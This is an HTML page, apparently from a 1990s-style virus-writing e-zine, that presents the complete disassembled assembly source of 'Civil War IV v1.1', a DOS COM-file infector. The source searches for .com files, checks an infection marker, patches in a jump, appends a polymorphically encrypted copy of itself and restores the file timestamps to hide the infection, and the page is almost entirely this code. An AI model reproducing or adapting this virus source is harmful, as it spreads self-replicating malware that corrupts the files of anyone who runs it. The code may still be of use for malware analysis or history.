<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>CIVIL 41</strong></font></p>

<p align="left"><font color="#00FFFF" size="3"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.radix 16<br>
.code<br>
<br>
extrn rnd_init:near<br>
extrn rnd_get:near<br>
extrn crypt:near<br>
extrn tpe_top:near<br>
<br>
org 100h<br>
<br>
len equ offset tpe_top - begin<br>
<br>
Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h<br>
<br>
Begin: call virus<br>
<br>
Virus: pop bp<br>
sub bp,offset virus<br>
<br>
mov dx,0fe00h<br>
mov ah,1ah<br>
int 21h<br>
<br>
Restore_begin: call rnd_init<br>
mov di,0100h<br>
lea si,ds:[buffer+bp]<br>
mov cx,06h<br>
rep movsb<br>
<br>
First: lea dx,[com_mask+bp]<br>
mov ah,04eh<br>
xor cx,cx<br>
int 21h<br>
<br>
Open_file: mov ax,03d02h<br>
mov dx,0fe1eh<br>
int 21h<br>
mov [handle+bp],ax<br>
xchg ax,bx<br>
<br>
Read_date: mov ax,05700h<br>
int 21h ;use<br>
mov [date+bp],dx<br>
mov [time+bp],cx<br>
<br>
Check_infect: mov bx,[handle+bp]<br>
mov ah,03fh ;file<br>
mov cx,06h<br>
lea dx,[buffer+bp]<br>
int 21h<br>
<br>
mov al,byte ptr [buffer+bp]+3<br>
mov ah,byte ptr [buffer+bp]+4<br>
cmp ax,[initials+bp]<br>
jne infect_file<br>
;start infecting file<br>
<br>
Close_file: mov bx,[handle+bp]<br>
mov ah,3eh<br>
int 21h<br>
<br>
Next_file: mov ah,4fh<br>
int 21h ;in directorie<br>
jnb open_file<br>
jmp exit<br>
<br>
Infect_file: mov ax,word ptr [cs:0fe1ah]<br>
sub ax,03h<br>
mov [lenght+bp],ax<br>
mov ax,04200h<br>
call move_pointer<br>
<br>
Write_jump: mov ah,40h<br>
mov cx,01h<br>
lea dx,[jump+bp]<br>
int 21h<br>
<br>
mov ah,40h<br>
mov cx,02h<br>
lea dx,[lenght+bp]<br>
int 21h<br>
<br>
mov ah,40<br>
mov cx,02h<br>
lea dx,[initials+bp]<br>
int 21h<br>
<br>
mov ax,4202h<br>
call move_pointer<br>
<br>
Encrypt: push bp<br>
<br>
mov ax,cs <br>
add ax,01000h<br>
mov es,ax<br>
<br>
lea dx,[begin+bp]<br>
<br>
mov cx,len<br>
<br>
mov bp,[lenght+bp]<br>
add bp,103h ; point<br>
<br>
xor si,si<br>
<br>
call rnd_get<br>
call crypt<br>
<br>
pop bp<br>
Write_virus: mov bx,[handle+bp]<br>
mov ah,40h<br>
int 21h<br>
<br>
Restore_date: mov ax,05701h<br>
mov bx,[handle+bp]<br>
mov cx,[time+bp]<br>
mov dx,[date+bp]<br>
int 21h<br>
<br>
Exit: mov ax,cs<br>
mov ds,ax<br>
mov es,ax<br>
mov bx,0100h<br>
jmp bx<br>
move_pointer: mov bx,[handle+bp]<br>
xor cx,cx<br>
xor dx,dx<br>
int 21h<br>
ret<br>
<br>
;----------------------------------------------------------------------------<br>
v_name db &quot;Civil War IV v1.1, (c) Jan '93 &quot;<br>
com_mask db &quot;*.com&quot;,0<br>
handle dw ?<br>
date dw ?<br>
time dw ?<br>
buffer db 090h,0cdh,020h,044h,048h,00h<br>
initials dw 4844h<br>
lenght dw ?<br>
jump db 0e9h,0<br>
message db &quot;For all i've seen has changed my mind&quot;<br>
db &quot;But still the wars go on as the years go by&quot;<br>
db &quot;With no love of God or human rights&quot;<br>
db &quot;'Cause all these dreams are swept aside&quot;<br>
db &quot;By bloody hands of the hypnotized&quot;<br>
db &quot;Who carry the cross of homicide&quot;<br>
db &quot;And history bears the scars of our Civil Wars.&quot;<br>
writer db &quot;[ DH / TridenT ]&quot;,00<br>
<br>
end dummy</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
